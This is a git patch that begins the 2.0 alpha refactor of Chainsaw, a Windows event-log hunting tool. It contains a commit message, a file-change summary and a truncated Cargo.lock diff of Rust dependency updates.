From 857c5bb7d10a60603a44fa59cc3d664ce3673c59 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Mon, 2 May 2022 20:58:38 +0100 Subject: [PATCH 01/77] feat: clean, refactor and improve chainsaw This is the first alpha build for chainsaw 2.0. Apart from aiming to clean, refactor and improve the code, the following should be noted: - CSV output is no longer supported - The mapping files have changed format - Builtin rules have been removed, these will be added later in a different form - Its an alpha anything could change --- Cargo.lock | 654 +++++++++--------------- Cargo.toml | 24 +- evtx_attack_samples | 1 - mapping_files/sigma-mapping.yml | 110 ---- mappings/sigma-event-logs.yml | 166 ++++++ sigma_rules | 1 - src/check.rs | 36 -- src/cli.rs | 266 ++++++++++ src/convert/mod.rs | 2 - src/convert/stalker.rs | 35 -- src/ext/mod.rs | 1 + src/ext/tau.rs | 129 +++++ src/file/evtx.rs | 93 ++++ src/file/mod.rs | 132 +++++ src/hunt.rs | 356 +++++++++++++ src/hunt/mod.rs | 873 -------------------------------- src/hunt/modules.rs | 730 -------------------------- src/lib.rs | 35 +- src/main.rs | 471 +++++++++++++---- src/rule/chainsaw.rs | 15 + src/rule/mod.rs | 99 ++++ src/{convert => rule}/sigma.rs | 12 - src/rule/stalker.rs | 38 ++ src/search.rs | 469 +++++++++-------- src/util.rs | 102 ---- src/write.rs | 37 +- 26 files changed, 2235 insertions(+), 2652 deletions(-) delete mode 160000 evtx_attack_samples delete mode 100644 mapping_files/sigma-mapping.yml create mode 100644 mappings/sigma-event-logs.yml delete mode 160000 sigma_rules delete mode 100644 src/check.rs create mode 100644 src/cli.rs delete mode 100644 src/convert/mod.rs delete mode 100644 src/convert/stalker.rs create mode 100644 src/ext/mod.rs create mode 100644 src/ext/tau.rs create mode 100644 src/file/evtx.rs create mode 100644 src/file/mod.rs create mode 100644 src/hunt.rs delete mode 100644 src/hunt/mod.rs delete mode 100644 src/hunt/modules.rs create mode 100644 src/rule/chainsaw.rs create mode 100644 src/rule/mod.rs rename src/{convert => rule}/sigma.rs (98%) create mode 100644 src/rule/stalker.rs delete mode 100644 src/util.rs diff --git a/Cargo.lock b/Cargo.lock index f77b9ef4..9908a99d 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -3,52 +3,37 @@ version = 3 [[package]] -name = "addr2line" -version = "0.16.0" +name = "aho-corasick" +version = "0.6.10" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3e61f2b7f93d2c7d2b08263acaa4a363b3e276806c68af6134c44f523bf1aacd" +checksum = "81ce3d38065e618af2d7b77e10c5ad9a069859b4be3c2250f674af3840d9c8a5" dependencies = [ - "gimli", + "memchr", ] -[[package]] -name = "adler" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f26201604c87b1e01bd3d98f8d5d9a8fcbb815e8cedb41ffccbeb4bf593a35fe" - [[package]] name = "aho-corasick" version = "0.7.18" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "1e37cfd5e7657ada45f742d6e99ca5788580b5c529dc78faf11ece6dc702656f" dependencies = [ - "memchr 2.4.1", -] - -[[package]] -name = "ajson" -version = "0.2.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fa6d6356148f1acf58e2bd07949af57855e1214172daab2153518608bb0dc6ee" -dependencies = [ - "regex", + "memchr", ] [[package]] name = "ansi_term" -version = "0.11.0" +version = "0.12.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ee49baf6cb617b853aa8d93bf420db2383fab46d314482ca2803b40d5fde979b" +checksum = "d52a9bb7ec0cf484c551830a7ce27bd20d67eac647e1befb56b0be4ee39a55d2" dependencies = [ "winapi", ] [[package]] name = "anyhow" -version = "1.0.43" +version = "1.0.57" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "28ae2b3dec75a406790005a200b1bd89785afc02517a00ca99ecfe093ee9e6cf" +checksum = "08f9b8508dccb7687a1d6c4ce66b2b0ecef467c94667de27d8d7fe1f8d2a9cdc" [[package]] name = "arrayref" @@ -75,24 +60,9 @@ dependencies = [ [[package]] name = "autocfg" -version = "1.0.1" +version = "1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cdb031dd78e28731d87d56cc8ffef4a8f36ca26c38fe2de700543e627f8a464a" - -[[package]] -name = "backtrace" -version = "0.3.61" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e7a905d892734eea339e896738c14b9afce22b5318f64b951e70bf3844419b01" -dependencies = [ - "addr2line", - "cc", - "cfg-if", - "libc", - "miniz_oxide", - "object", - "rustc-demangle", -] +checksum = "d468802bab17cbc0cc575e9b053f41e72aa36bfa6b7f55e3529ffa43161b97fa" [[package]] name = "base64" @@ -119,12 +89,12 @@ dependencies = [ [[package]] name = "bstr" -version = "0.2.16" +version = "0.2.17" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "90682c8d613ad3373e66de8c6411e0ae2ab2571e879d2efbf73558cc66f21279" +checksum = "ba3569f383e8f1598449f1a423e72e99569137b47740b1da11ef19af3d5c3223" dependencies = [ "lazy_static", - "memchr 2.4.1", + "memchr", "regex-automata", "serde", ] @@ -137,9 +107,9 @@ checksum = "b4ae4235e6dac0694637c763029ecea1a2ec9e4e06ec2729bd21ba4d9c863eb7" [[package]] name = "bytecount" -version = "0.6.2" +version = "0.6.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "72feb31ffc86498dacdbd0fcebb56138e7177a8cc5cea4516031d15ae85a742e" +checksum = "2c676a478f63e9fa2dd5368a42f28bba0d6c560b775f38583c8bbaa7fcd67c9c" [[package]] name = "byteorder" @@ -147,6 +117,15 @@ version = "1.4.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "14c189c53d098945499cdfa7ecc63567cf3886b3332b312a5b4585d8d3a6a610" +[[package]] +name = "camino" +version = "1.0.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "869119e97797867fd90f5e22af7d0bd274bd4635ebb9eb68c04f3f513ae6c412" +dependencies = [ + "serde", +] + [[package]] name = "cargo-platform" version = "0.1.2" @@ -158,23 +137,17 @@ dependencies = [ [[package]] name = "cargo_metadata" -version = "0.12.3" +version = "0.14.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7714a157da7991e23d90686b9524b9e12e0407a108647f52e9328f4b3d51ac7f" +checksum = "4acbb09d9ee8e23699b9634375c72795d095bf268439da88562cf9b501f181fa" dependencies = [ + "camino", "cargo-platform", "semver", - "semver-parser", "serde", "serde_json", ] -[[package]] -name = "cc" -version = "1.0.70" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d26a6ce4b6a484fa3edb70f7efa6fc430fd2b87285fe8b84304fd0936faa0dc0" - [[package]] name = "cfg-if" version = "1.0.0" @@ -183,32 +156,24 @@ checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "chainsaw" -version = "1.1.7" +version = "2.0.0-alpha.0" dependencies = [ - "ajson", + "aho-corasick 0.7.18", "anyhow", "chrono", + "chrono-tz", "colour", - "csv 1.1.6", - "env_logger 0.6.2", "evtx", - "failure", - "glob", "indicatif", - "is_elevated", - "itertools", - "log", "paste", "prettytable-rs", "rayon", - "regex", + "regex 1.5.6", "serde", - "serde_derive", "serde_json", "serde_yaml", "structopt", "tau-engine", - "walkdir", ] [[package]] @@ -225,11 +190,22 @@ dependencies = [ "winapi", ] +[[package]] +name = "chrono-tz" +version = "0.4.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "aa1878c18b5b01b9978d5f130fe366d434022004d12fb87c182e8459b427c4a3" +dependencies = [ + "chrono", + "parse-zoneinfo", + "serde", +] + [[package]] name = "clap" -version = "2.33.3" +version = "2.34.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "37e58ac78573c40708d45522f0d80fa2f01cc4f9b4e2bf749807255454312002" +checksum = "a0610544180c38b88101fecf2dd634b174a62eef6946f84dfc6a7127512b381c" dependencies = [ "ansi_term", "atty", @@ -258,12 +234,25 @@ dependencies = [ "encode_unicode", "lazy_static", "libc", - "regex", + "regex 1.5.6", "terminal_size", "unicode-width", "winapi", ] +[[package]] +name = "console" +version = "0.15.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a28b32d32ca44b70c3e4acd7db1babf555fa026e385fb95f18028f88848b3c31" +dependencies = [ + "encode_unicode", + "libc", + "once_cell", + "terminal_size", + "winapi", +] + [[package]] name = "constant_time_eq" version = "0.1.5" @@ -281,9 +270,9 @@ dependencies = [ [[package]] name = "crossbeam-channel" -version = "0.5.1" +version = "0.5.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "06ed27e177f16d65f0f0c22a213e17c696ace5dd64b14258b52f9417ccb52db4" +checksum = "5aaa7bd5fb665c6864b5f963dd9097905c54125909c7aa94c9e18507cdbe6c53" dependencies = [ "cfg-if", "crossbeam-utils", @@ -302,10 +291,11 @@ dependencies = [ [[package]] name = "crossbeam-epoch" -version = "0.9.5" +version = "0.9.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4ec02e091aa634e2c3ada4a392989e7c3116673ef0ac5b72232439094d73b7fd" +checksum = "1145cf131a2c6ba0615079ab6a638f7e1973ac9c2634fcbeaaad6114246efe8c" dependencies = [ + "autocfg", "cfg-if", "crossbeam-utils", "lazy_static", @@ -315,9 +305,9 @@ dependencies = [ [[package]] name = "crossbeam-utils" -version = "0.8.5" +version = "0.8.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d82cfc11ce7f2c3faef78d8a684447b40d503d9681acebed6cb728d45940c4db" +checksum = "0bf124c720b7686e3c2663cf54062ab0f68a88af2fb6a030e87e30bf721fcb38" dependencies = [ "cfg-if", "lazy_static", @@ -348,17 +338,6 @@ dependencies = [ "winapi", ] -[[package]] -name = "csv" -version = "0.15.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7ef22b37c7a51c564a365892c012dc0271221fdcc64c69b19ba4d6fa8bd96d9c" -dependencies = [ - "byteorder", - "memchr 1.0.2", - "rustc-serialize", -] - [[package]] name = "csv" version = "1.1.6" @@ -367,7 +346,7 @@ checksum = "22813a6dc45b335f9bade10bf7271dc477e81113e89eb251a0bc2a8a81c536e1" dependencies = [ "bstr", "csv-core", - "itoa", + "itoa 0.4.8", "ryu", "serde", ] @@ -378,7 +357,7 @@ version = "0.1.10" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "2b2466559f260f48ad25fe6317b3c8dac77b5bdb5763ac7d9d6103530663bc90" dependencies = [ - "memchr 2.4.1", + "memchr", ] [[package]] @@ -387,7 +366,7 @@ version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c9dd058f8b65922819fabb4a41e7d1964e56344042c26efbccd465202c23fa0c" dependencies = [ - "console", + "console 0.14.1", "lazy_static", "tempfile", "zeroize", @@ -404,12 +383,6 @@ dependencies = [ "winapi", ] -[[package]] -name = "dtoa" -version = "0.4.8" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "56899898ce76aaf4a0f24d914c97ea6ed976d42fec6ad33fcbb0a1103e07b2b0" - [[package]] name = "either" version = "1.6.1" @@ -486,19 +459,6 @@ version = "0.1.4" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "a246d82be1c9d791c5dfde9a2bd045fc3cbba3fa2b11ad558f27d01712f00569" -[[package]] -name = "env_logger" -version = "0.6.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "aafcde04e90a5226a6443b7aabdb016ba2f8307c847d524724bd9b346dd1a2d3" -dependencies = [ - "atty", - "humantime", - "log", - "regex", - "termcolor", -] - [[package]] name = "env_logger" version = "0.7.1" @@ -508,7 +468,7 @@ dependencies = [ "atty", "humantime", "log", - "regex", + "regex 1.5.6", "termcolor", ] @@ -548,25 +508,12 @@ dependencies = [ ] [[package]] -name = "failure" -version = "0.1.8" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d32e9bd16cc02eae7db7ef620b392808b89f6a5e16bb3497d159c6b92a0f4f86" -dependencies = [ - "backtrace", - "failure_derive", -] - -[[package]] -name = "failure_derive" -version = "0.1.8" +name = "fastrand" +version = "1.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "aa4da3c766cd7a0db8242e326e9e4e081edd567072893ed320008189715366a4" +checksum = "c3fcf0cee53519c866c09b5de1f6c56ff9d647101f81c1964fa632e148896cdf" dependencies = [ - "proc-macro2", - "quote", - "syn", - "synstructure", + "instant", ] [[package]] @@ -580,23 +527,6 @@ dependencies = [ "wasi 0.9.0+wasi-snapshot-preview1", ] -[[package]] -name = "getrandom" -version = "0.2.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7fcd999463524c52659517fe2cea98493cfe485d10565e7b0fb07dbba7ad2753" -dependencies = [ - "cfg-if", - "libc", - "wasi 0.10.2+wasi-snapshot-preview1", -] - -[[package]] -name = "gimli" -version = "0.25.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f0a01e0497841a3b2db4f8afa483cce65f7e96a3498bd6c541734792aeac8fe7" - [[package]] name = "glob" version = "0.3.0" @@ -638,9 +568,9 @@ dependencies = [ [[package]] name = "indexmap" -version = "1.7.0" +version = "1.8.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bc633605454125dec4b66843673f01c7df2b89479b32e0ed634e43a91cff62a5" +checksum = "e6012d540c5baa3589337a98ce73408de9b5a25ec9fc2c6fd6be8f0d39e0ca5a" dependencies = [ "autocfg", "hashbrown", @@ -652,53 +582,38 @@ version = "0.16.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "2d207dc617c7a380ab07ff572a6e52fa202a2a8f355860ac9c38e23f8196be1b" dependencies = [ - "console", + "console 0.15.0", "lazy_static", "number_prefix", - "regex", + "regex 1.5.6", ] [[package]] name = "indoc" -version = "1.0.3" +version = "1.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e5a75aeaaef0ce18b58056d306c27b07436fbb34b8816c53094b76dd81803136" -dependencies = [ - "unindent", -] +checksum = "05a0bd019339e5d968b37855180087b7b9d512c5046fbd244cf8c95687927d6e" [[package]] name = "instant" -version = "0.1.10" +version = "0.1.12" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bee0328b1209d157ef001c94dd85b4f8f64139adb0eac2659f4b08382b2f474d" +checksum = "7a5bbe824c507c5da5956355e86a746d82e0e1464f65d862cc5e71da70e94b2c" dependencies = [ "cfg-if", ] [[package]] -name = "is_elevated" -version = "0.1.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5299060ff5db63e788015dcb9525ad9b84f4fd9717ed2cbdeba5018cbf42f9b5" -dependencies = [ - "winapi", -] - -[[package]] -name = "itertools" -version = "0.10.1" +name = "itoa" +version = "0.4.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "69ddb889f9d0d08a67338271fa9b62996bc788c7796a5c18cf057420aaed5eaf" -dependencies = [ - "either", -] +checksum = "b71991ff56294aa922b450139ee08b3bfc70982c6b2c7562771375cf73542dd4" [[package]] name = "itoa" -version = "0.4.8" +version = "1.0.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b71991ff56294aa922b450139ee08b3bfc70982c6b2c7562771375cf73542dd4" +checksum = "112c678d4050afce233f4f2852bb2eb519230b3cf12f33585275537d7e41578d" [[package]] name = "lazy_static" @@ -708,9 +623,9 @@ checksum = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646" [[package]] name = "libc" -version = "0.2.101" +version = "0.2.126" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3cb00336871be5ed2c8ed44b60ae9959dc5b9f08539422ed43f09e34ecaeba21" +checksum = "349d5a591cd28b49e1d1037471617a32ddcda5731b99419008085f72d5a53836" [[package]] name = "linked-hash-map" @@ -720,61 +635,43 @@ checksum = "7fb9b38af92608140b86b693604b9ffcc5824240a484d1ecd4795bacb2fe88f3" [[package]] name = "lock_api" -version = "0.4.5" +version = "0.4.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "712a4d093c9976e24e7dbca41db895dabcbac38eb5f4045393d17a95bdfb1109" +checksum = "327fa5b6a6940e4699ec49a9beae1ea4845c6bab9314e4f84ac68742139d8c53" dependencies = [ + "autocfg", "scopeguard", ] [[package]] name = "log" -version = "0.4.14" +version = "0.4.17" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "51b9bbe6c47d51fc3e1a9b945965946b4c44142ab8792c50835a980d362c2710" +checksum = "abb12e687cfb44aa40f41fc3978ef76448f9b6038cad6aef4259d3c095a2382e" dependencies = [ "cfg-if", ] [[package]] name = "memchr" -version = "1.0.2" +version = "2.5.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "148fab2e51b4f1cfc66da2a7c32981d1d3c083a803978268bb11fe4b86925e7a" -dependencies = [ - "libc", -] - -[[package]] -name = "memchr" -version = "2.4.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "308cc39be01b73d0d18f82a0e7b2a3df85245f84af96fdddc5d202d27e47b86a" +checksum = "2dffe52ecf27772e601905b7522cb4ef790d2cc203488bbd0e2fe85fcb74566d" [[package]] name = "memoffset" -version = "0.6.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "59accc507f1338036a0477ef61afdae33cde60840f4dfe481319ce3ad116ddf9" -dependencies = [ - "autocfg", -] - -[[package]] -name = "miniz_oxide" -version = "0.4.4" +version = "0.6.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a92518e98c078586bc6c934028adcca4c92a53d6a958196de835170a01d84e4b" +checksum = "5aa361d4faea93603064a027415f07bd8e1d5c88c9fbf68bf56a285428fd79ce" dependencies = [ - "adler", "autocfg", ] [[package]] name = "mio" -version = "0.7.13" +version = "0.7.14" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8c2bdb6314ec10835cd3293dd268473a835c02b7b352e788be788b3c6ca6bb16" +checksum = "8067b404fe97c70829f082dec8bcf4f71225d7eaea1d8645349cb76fa06205cc" dependencies = [ "libc", "log", @@ -794,9 +691,9 @@ dependencies = [ [[package]] name = "ntapi" -version = "0.3.6" +version = "0.3.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3f6bb902e437b6d86e03cce10a7e2af662292c5dfef23b65899ea3ac9354ad44" +checksum = "c28774a7fd2fbb4f0babd8237ce554b73af68021b5f695a3cebd6c59bac0980f" dependencies = [ "winapi", ] @@ -814,9 +711,9 @@ dependencies = [ [[package]] name = "num-integer" -version = "0.1.44" +version = "0.1.45" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d2cc698a63b549a70bc047073d2949cce27cd1c7b0a4a862d08a8031bc2801db" +checksum = "225d3389fb3509a24c93f5c29eb6bde2586b98d9f016636dff58d7c6f7569cd9" dependencies = [ "autocfg", "num-traits", @@ -824,18 +721,18 @@ dependencies = [ [[package]] name = "num-traits" -version = "0.2.14" +version = "0.2.15" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9a64b1ec5cda2586e284722486d802acf1f7dbdc623e2bfc57e65ca1cd099290" +checksum = "578ede34cf02f8924ab9447f50c28075b4d3e5b269972345e7e0372b38c6cdcd" dependencies = [ "autocfg", ] [[package]] name = "num_cpus" -version = "1.13.0" +version = "1.13.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "05499f3756671c15885fee9034446956fff3f243d6077b91e5767df161f766b3" +checksum = "19e64526ebdee182341572e50e9ad03965aa510cd94427a4549448f285e957a1" dependencies = [ "hermit-abi", "libc", @@ -848,13 +745,10 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "830b246a0e5f20af87141b25c173cd1b609bd7779a4617d6ec582abaf90870f3" [[package]] -name = "object" -version = "0.26.2" +name = "once_cell" +version = "1.12.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "39f37e50073ccad23b6d09bcb5b263f4e76d3bb6038e4a3c08e52162ffa8abc2" -dependencies = [ - "memchr 2.4.1", -] +checksum = "7709cef83f0c1f58f666e746a08b21e0085f7440fa6a29cc194d68aac97a4225" [[package]] name = "parking_lot" @@ -876,46 +770,40 @@ dependencies = [ "cfg-if", "instant", "libc", - "redox_syscall 0.2.10", + "redox_syscall 0.2.13", "smallvec", "winapi", ] [[package]] -name = "paste" -version = "1.0.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0744126afe1a6dd7f394cb50a716dbe086cb06e255e53d8d0185d82828358fb5" - -[[package]] -name = "pest" -version = "2.1.3" +name = "parse-zoneinfo" +version = "0.1.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "10f4872ae94d7b90ae48754df22fd42ad52ce740b8f370b03da4835417403e53" +checksum = "f4ee19a3656dadae35a33467f9714f1228dd34766dbe49e10e656b5296867aea" dependencies = [ - "ucd-trie", + "regex 0.2.11", ] [[package]] -name = "pin-project-lite" -version = "0.2.7" +name = "paste" +version = "1.0.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8d31d11c69a6b52a174b42bdc0c30e5e11670f90788b2c471c31c1d17d449443" +checksum = "0c520e05135d6e763148b6426a837e239041653ba7becd2e538c076c738025fc" [[package]] -name = "ppv-lite86" -version = "0.2.10" +name = "pin-project-lite" +version = "0.2.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ac74c624d6b2d21f425f752262f42188365d7b8ff1aff74c82e45136510a4857" +checksum = "e0a7ae3ac2f1173085d398531c705756c94a4c56843785df85a60c1a0afac116" [[package]] name = "prettytable-rs" -version = "0.7.0" +version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5511ca4c805aa35f0abff6be7923231d664408b60c09f44ef715f2bce106cd9e" +checksum = "0fd04b170004fa2daccf418a7f8253aaf033c27760b5f225889024cf66d7ac2e" dependencies = [ "atty", - "csv 0.15.0", + "csv", "encode_unicode", "lazy_static", "term", @@ -948,21 +836,21 @@ dependencies = [ [[package]] name = "proc-macro2" -version = "1.0.29" +version = "1.0.39" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b9f5105d4fdaab20335ca9565e106a5d9b82b6219b5ba735731124ac6711d23d" +checksum = "c54b25569025b7fc9651de43004ae593a75ad88543b17178aa5e1b9c4f15f56f" dependencies = [ - "unicode-xid", + "unicode-ident", ] [[package]] name = "pulldown-cmark" -version = "0.8.0" +version = "0.9.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ffade02495f22453cd593159ea2f59827aae7f53fa8323f756799b670881dcf8" +checksum = "34f197a544b0c9ab3ae46c359a7ec9cbbb5c7bf97054266fecb7ead794a181d6" dependencies = [ "bitflags", - "memchr 2.4.1", + "memchr", "unicase", ] @@ -978,63 +866,23 @@ version = "0.22.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "8533f14c8382aaad0d592c812ac3b826162128b65662331e1127b45c3d18536b" dependencies = [ - "memchr 2.4.1", + "memchr", ] [[package]] name = "quote" -version = "1.0.9" +version = "1.0.18" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c3d0b9745dc2debf507c8422de05d7226cc1f0644216dfdfead988f9b1ab32a7" +checksum = "a1feb54ed693b93a84e14094943b84b7c4eae204c512b7ccb95ab0c66d278ad1" dependencies = [ "proc-macro2", ] -[[package]] -name = "rand" -version = "0.8.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2e7573632e6454cf6b99d7aac4ccca54be06da05aca2ef7423d22d27d4d4bcd8" -dependencies = [ - "libc", - "rand_chacha", - "rand_core", - "rand_hc", -] - -[[package]] -name = "rand_chacha" -version = "0.3.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6c10a63a0fa32252be49d21e7709d4d4baf8d231c2dbce1eaa8141b9b127d88" -dependencies = [ - "ppv-lite86", - "rand_core", -] - -[[package]] -name = "rand_core" -version = "0.6.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d34f1408f55294453790c48b2f1ebbb1c5b4b7563eb1f418bcfcfdbb06ebb4e7" -dependencies = [ - "getrandom 0.2.3", -] - -[[package]] -name = "rand_hc" -version = "0.3.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d51e9f596de227fda2ea6c84607f5558e196eeaf43c986b724ba4fb8fdf497e7" -dependencies = [ - "rand_core", -] - [[package]] name = "rayon" -version = "1.5.1" +version = "1.5.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c06aca804d41dbc8ba42dfd964f0d01334eceb64314b9ecf7c5fad5188a06d90" +checksum = "bd99e5772ead8baa5215278c9b15bf92087709e9c1b2d1f97cdb5a183c933a7d" dependencies = [ "autocfg", "crossbeam-deque", @@ -1044,14 +892,13 @@ dependencies = [ [[package]] name = "rayon-core" -version = "1.9.1" +version = "1.9.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d78120e2c850279833f1dd3582f730c4ab53ed95aeaaaa862a2a5c71b1656d8e" +checksum = "258bcdb5ac6dad48491bb2992db6b7cf74878b0384908af124823d118c99683f" dependencies = [ "crossbeam-channel", "crossbeam-deque", "crossbeam-utils", - "lazy_static", "num_cpus", ] @@ -1063,9 +910,9 @@ checksum = "41cc0f7e4d5d4544e8861606a285bb08d3e70712ccc7d2b84d7c0ccfaf4b05ce" [[package]] name = "redox_syscall" -version = "0.2.10" +version = "0.2.13" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8383f39639269cde97d255a32bdb68c047337295414940c68bdd30c2e13203ff" +checksum = "62f25bc4c7e55e0b0b7a1d43fb893f4fa1361d0abe38b9ce4f323c2adfe6ef42" dependencies = [ "bitflags", ] @@ -1076,20 +923,33 @@ version = "0.3.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "de0737333e7a9502c789a36d7c7fa6092a49895d4faa31ca5df163857ded2e9d" dependencies = [ - "getrandom 0.1.16", + "getrandom", "redox_syscall 0.1.57", "rust-argon2", ] [[package]] name = "regex" -version = "1.5.4" +version = "0.2.11" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9329abc99e39129fcceabd24cf5d85b4671ef7c29c50e972bc5afe32438ec384" +dependencies = [ + "aho-corasick 0.6.10", + "memchr", + "regex-syntax 0.5.6", + "thread_local", + "utf8-ranges", +] + +[[package]] +name = "regex" +version = "1.5.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d07a8629359eb56f1e2fb1652bb04212c072a87ba68546a04065d525673ac461" +checksum = "d83f127d94bdbcda4c8cc2e50f6f84f4b611f69c902699ca385a39c3a75f9ff1" dependencies = [ - "aho-corasick", - "memchr 2.4.1", - "regex-syntax", + "aho-corasick 0.7.18", + "memchr", + "regex-syntax 0.6.26", ] [[package]] @@ -1100,9 +960,18 @@ checksum = "6c230d73fb8d8c1b9c0b3135c5142a8acee3a0558fb8db5cf1cb65f8d7862132" [[package]] name = "regex-syntax" -version = "0.6.25" +version = "0.5.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f497285884f3fcff424ffc933e56d7cbca511def0c9831a7f9b5f6153e3cc89b" +checksum = "7d707a4fa2637f2dca2ef9fd02225ec7661fe01a53623c1e6515b6916511f7a7" +dependencies = [ + "ucd-util", +] + +[[package]] +name = "regex-syntax" +version = "0.6.26" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "49b3de9ec5dc0a3417da371aab17d729997c15010e7fd24ff707773a33bddb64" [[package]] name = "remove_dir_all" @@ -1125,23 +994,11 @@ dependencies = [ "crossbeam-utils", ] -[[package]] -name = "rustc-demangle" -version = "0.1.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7ef03e0a2b150c7a90d01faf6254c9c48a41e95fb2a8c2ac1c6f0d2b9aefc342" - -[[package]] -name = "rustc-serialize" -version = "0.3.24" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "dcf128d1287d2ea9d80910b5f1120d0b8eede3fbf1abe91c40d39ea7d51e6fda" - [[package]] name = "ryu" -version = "1.0.5" +version = "1.0.10" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "71d301d4193d031abdd79ff7e3dd721168a9572ef3fe51a1517aba235bd8f86e" +checksum = "f3f6f92acf49d1b98f7a81226834412ada05458b7364277387724a237f062695" [[package]] name = "same-file" @@ -1160,37 +1017,27 @@ checksum = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd" [[package]] name = "semver" -version = "0.11.0" +version = "1.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f301af10236f6df4160f7c3f04eec6dbc70ace82d23326abad5edee88801c6b6" +checksum = "8cb243bdfdb5936c8dc3c45762a19d12ab4550cdc753bc247637d4ec35a040fd" dependencies = [ - "semver-parser", "serde", ] -[[package]] -name = "semver-parser" -version = "0.10.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "00b0bef5b7f9e0df16536d3961cfb6e84331c065b4066afb39768d0e319411f7" -dependencies = [ - "pest", -] - [[package]] name = "serde" -version = "1.0.117" +version = "1.0.137" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b88fa983de7720629c9387e9f517353ed404164b1e482c970a90c1a4aaf7dc1a" +checksum = "61ea8d54c77f8315140a05f4c7237403bf38b72704d031543aa1d16abbf517d1" dependencies = [ "serde_derive", ] [[package]] name = "serde_derive" -version = "1.0.117" +version = "1.0.137" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cbd1ae72adb44aab48f325a02444a5fc079349a8d804c1fc922aed3f7454c74e" +checksum = "1f26faba0c3959972377d3b2d306ee9f71faee9714294e41bb777f83f88578be" dependencies = [ "proc-macro2", "quote", @@ 